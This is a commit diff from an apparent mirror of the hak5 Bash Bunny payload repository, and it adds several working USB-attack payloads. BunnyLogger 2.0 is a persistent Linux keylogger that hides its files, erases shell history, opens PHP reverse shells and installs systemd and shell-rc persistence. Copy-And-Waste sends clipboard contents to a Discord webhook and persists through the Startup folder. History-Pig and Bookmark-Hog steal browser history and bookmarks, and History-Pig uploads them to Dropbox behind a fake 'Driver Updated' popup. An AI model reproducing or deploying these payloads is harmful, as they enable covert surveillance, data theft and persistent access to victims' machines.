hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/560/head
0iphor13 2022-10-10 13:15:13 +02:00 committed by GitHub
parent 7cd924d77b 8f19915a5f
commit 39fb59e9e9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
39 changed files with 1772 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
payloads/library/credentials/BunnyLogger2.0/README.md Normal file
View File

@ -0,0 +1,39 @@
## About:
* Title: BunnyLogger 2.0
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger 2.0: BunnyLogger is a Key Logger which captures every key stroke of target and send them to attacker.
### Features:
* Live keystroke capturing.
* Stored Keystroke capturing.
* Bunny Logger Manager: Interactive TUI Dashboard.
* Detailed key logs.
* Persistent.
* Autostart payload on boot.
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ------------------------------ |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| requirements/* | /payloads/library/bunnyLogger2 |
### LED Status:
* `LED SETUP` : MAGENTA
* `LED ATTACK` : YELLOW
* `LED FINISH` : GREEN
### Usage:
* Install BunnyLogger 2.0: `chmod +x install.sh && sudo ./install.sh`
* Run : `bunnyLoggerMgr` to launch BunnyLogger Manager.
#### Support me if you like my work:
* https://twitter.com/drapl0n

7
payloads/library/credentials/BunnyLogger2.0/install.sh Normal file
View File

@ -0,0 +1,7 @@
#!/bin/bash
loc=$HOME/.config/bunnyLogger
mkdir $loc
cp requirements/payload.sh $loc
touch $loc/bunnyLogger.db
chmod +x requirements/bunnyLoggerMgr
sudo cp requirements/bunnyLoggerMgr /usr/local/bin/

53
payloads/library/credentials/BunnyLogger2.0/payload.txt Normal file
View File

@ -0,0 +1,53 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk'
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

191
payloads/library/credentials/BunnyLogger2.0/requirements/bunnyLoggerMgr Normal file
View File

@ -0,0 +1,191 @@
#!/bin/bash
allowAbort=true;
myInterruptHandler()
{
if $allowAbort; then
echo
echo -e "\n\033[1;34m[INFO]: \e[0mYou terminated bunnyLoggerMgr..." && exit 1;
fi;
}
trap myInterruptHandler SIGINT
echo -e "\033[4m\033[1mWelcome to BunnyLogger Manager!!!\033[0m"
echo
echo -e "1] Fetch Keylogs.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target.\n6] Decode Key Logs."
echo
read -p "Enter your choice: " ch
create(){
read -p "Enter Target's name(without whitespaces): " name
if [[ $(grep -oh "\w*$name\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $name ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mName \"$name\" already exists."
exit 1
fi
read -p "Enter Servers IP: " ip
read -p "Enter Unique Port Number(1500-65535): " port
read -p "Enter another Unique Port Number(1500-65535): " secPort
if [ "$port" == "$secPort" ]; then
echo -e "\033[1;34m[INFO]: \033[0mTwo ports can't be similar."
exit 1
fi
if [[ $(grep -oh "\w*$ip\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $port ]] && [[ $(grep -oh "\w*$secPort\w*" ~/.config/bunnyLogger/bunnyLogger.db) == $secPort ]]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mTarget exist with similar IP address \"$ip\" and port number one \"$port\", port number two \"$secPort\"."
exit 1
fi
max=65535
min=1500
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )) && (( $secPort <= $max )) && (( $secPort >= $min )); then
read -p "Specify directory for output: " dir
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
cp -r ~/.config/bunnyLogger/payload.sh $dir
fi
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload.sh
sed -i -e "s/4444/$port/g" $dir/payload.sh
sed -i -e "s/5555/$secPort/g" $dir/payload.sh
echo -e "$(echo "$name"|xargs)\t$ip\t$port\t$secPort" >> ~/.config/bunnyLogger/bunnyLogger.db
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$ip\" or Port Number \"$port\" or Port Number \"$secPort\"."
exit 1
fi
}
list(){
column -t -o ' ' ~/.config/bunnyLogger/bunnyLogger.db | awk '{print NR" - "$0}'
}
remove(){
echo
list
echo
read -p "Enter name of target to remove: " rmv
if grep -q $rmv ~/.config/bunnyLogger/bunnyLogger.db; then
sed -i "/\b\($rmv\)\b/d" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0m Successfully Removed \"$rmv\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$rmv\" no such target found."
fi
}
update(){
echo
list
echo
read -p "Choose target number: " cho
read -p "You want to update (ip|portOne|portTwo): " ent
if [ "$ent" = ip ]
then
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
read -p "Enter new ip: " use
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
sed -i -e "$cho s/$one/$use/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mSuccessfully Updated IP."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid IP address \"$use\"."
exit
fi
elif [ "$ent" = portOne ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
elif [ "$ent" = portTwo ]
then
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/bunnyLogger/bunnyLogger.db
echo -e "\033[1;34m\e[1m[INFO]: \e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Port Number \"$useP\"."
fi
else
echo -e "\033[1;31m\e[1m[ERROR]: \e0m[Invalid choice \"$ent\"."
fi
}
fetch(){
echo
list
echo
read -p "Enter Target number to connect: " cho
one=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
two=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 3}')
three=$(sed ""$cho\!d"" ~/.config/bunnyLogger/bunnyLogger.db | awk '{print $ 4}')
echo -en "1] Live Capture \t2]Fetch Stored Logs: "
read typ
case $typ in
1)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
echo "\033[1;34m\e[1m[[INFO]: \e[0mStarted Keylogs Capture..."
nc -lvp $two > $dir/$filename.log
fi
;;
2)
read -p "Specify directory for output: " dir
read -p "Enter filename to store logs: " filename
if [ ! -d "$dir" ]; then
echo -e "\033[1;31m\e[1m[ERROR]: \e[0m\"$dir\" no such directory."
exit 1
else
nc -lvp 1444 > $dir/$filename.log &
nc -lvp $three
fi
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice.."
;;
esac
}
decode(){
echo -e "1] Normal Decode \t2] Informative Decode"
read -p "Enter your choice: " cho
read -p "Enter path of file to decode: " path
read -p "Enter path for decoded log: " out
case $cho in
1)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path | grep press | awk '{print $4}' > $out
;;
2)
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $path > $out
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: \e[0mInvalid Choice \"$cho\"."
;;
esac
}
case $ch in
1)
fetch
;;
2)
create
;;
3)
list
;;
4)
update
;;
5)
remove
;;
6)
decode
;;
*)
echo -e "\033[1;31m\e[1m[ERROR]: Invalid Choice \"$ch\"."
;;
esac

41
payloads/library/credentials/BunnyLogger2.0/requirements/clctrl Normal file
View File

@ -0,0 +1,41 @@
#!/bin/bash
transfer(){
echo -e "\033[1;34m[INFO]: Target Logs:\033[0m"
cd /var/tmp/.system/logs/
ls /var/tmp/.system/logs/ | sort
echo
echo -n "Enter filename to transfer: "
read ch
if [ -f $ch ];
then
echo -e "\033[1;34m[INFO]: Transferring file...\033[0m"
/var/tmp/.system/./nc -q 0 127.0.0.1 1444 < $ch >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo -e "\033[1;32m[SUCCESS]: File Transferred.\033[0m"
else
echo -e "\033[1;34m[INFO]: Netcat listner is not running on Attacking system.\033[0m\n\033[1;31m[ERROR]: File transfer failed.\033[0m"
fi
else
echo -e "\033[1;31m[ERROR]: Invalid Filename \"$ch\".\033[0m"
fi
}
conti(){
while :
do
echo
echo -n "Would you like to transfer more files? [Y/N]: "
read ch
if [ "$ch" = y ] || [ "$ch" = Y ];
then
transfer
elif [ "$ch" = N ] || [ "$ch" = n ];
then
echo -e "\033[1;34m[INFO]: Terminating...\033[0m"
break
else
echo -e "\033[1;31m[ERROR]: Invalid Choice \"$ch\".\033[0m"
fi
done
}
transfer
conti

BIN
payloads/library/credentials/BunnyLogger2.0/requirements/nc Normal file
View File

Binary file not shown.

28
payloads/library/credentials/BunnyLogger2.0/requirements/payload.sh Normal file
View File

@ -0,0 +1,28 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir -p /var/tmp/.system/logs
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/clctrl /var/tmp/.system/
cp -r $mntt/payloads/library/bunnyLogger2/nc /var/tmp/.system/
chmod +x /var/tmp/.system/nc
echo -e "name=\$(date +\"%y-%m-%d-%T\")\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test > /var/tmp/.system/logs/\$name.log &\n/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/clctrl
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone &\nwhile :\ndo\n\tping -c 5 127.0.0.1\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"127.0.0.1\",5555);exec("\"/var/tmp/.system/./clctrl "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

BIN
payloads/library/credentials/BunnyLogger2.0/requirements/xinput Normal file
View File

Binary file not shown.

4
payloads/library/credentials/BunnyLogger2.0/uninstall.sh Normal file
View File

@ -0,0 +1,4 @@
#!/bin/bash
loc=$HOME/.config/bunnyLogger
rm -rf $loc
sudo rm /usr/local/bin/bunnyLoggerMgr

2
payloads/library/credentials/Jackalope/payload.txt
View File

@ -28,7 +28,7 @@ mkdir -p $LOOTDIR
MSF_DIR=/tools/metasploit-framework
# Save environment informaiton:
# Save environment information:
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt

47
payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 Normal file
View File

@ -0,0 +1,47 @@
#Bookmark-Hog
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
}
# See if file is a thing
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}

104
payloads/library/exfiltration/Bookmark-Hog/README.md Normal file
View File

@ -0,0 +1,104 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the bash bunny in the loot directory
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Let the magic happen
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/exfiltration/Bookmark-Hog/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Bookmark-Hog
# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
# Author: atomiczsec
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
QUACK ENTER

3
payloads/library/exfiltration/Copy-And-Waste/I.bat Normal file
View File

@ -0,0 +1,3 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause

119
payloads/library/exfiltration/Copy-And-Waste/README.md Normal file
View File

@ -0,0 +1,119 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

36
payloads/library/exfiltration/Copy-And-Waste/c.ps1 Normal file
View File

@ -0,0 +1,36 @@
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}

17
payloads/library/exfiltration/Copy-And-Waste/payload.txt Normal file
View File

@ -0,0 +1,17 @@
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH

63
payloads/library/exfiltration/History-Pig/HP.ps1 Normal file
View File

@ -0,0 +1,63 @@
#History-Pig
# See if file is a thing
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome History to Temp Directory to get sent to Dropbox
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge History to Temp Directory to get sent to Dropbox
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

109
payloads/library/exfiltration/History-Pig/README.md Normal file
View File

@ -0,0 +1,109 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# History-Pig
A payload to exfiltrate the history of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
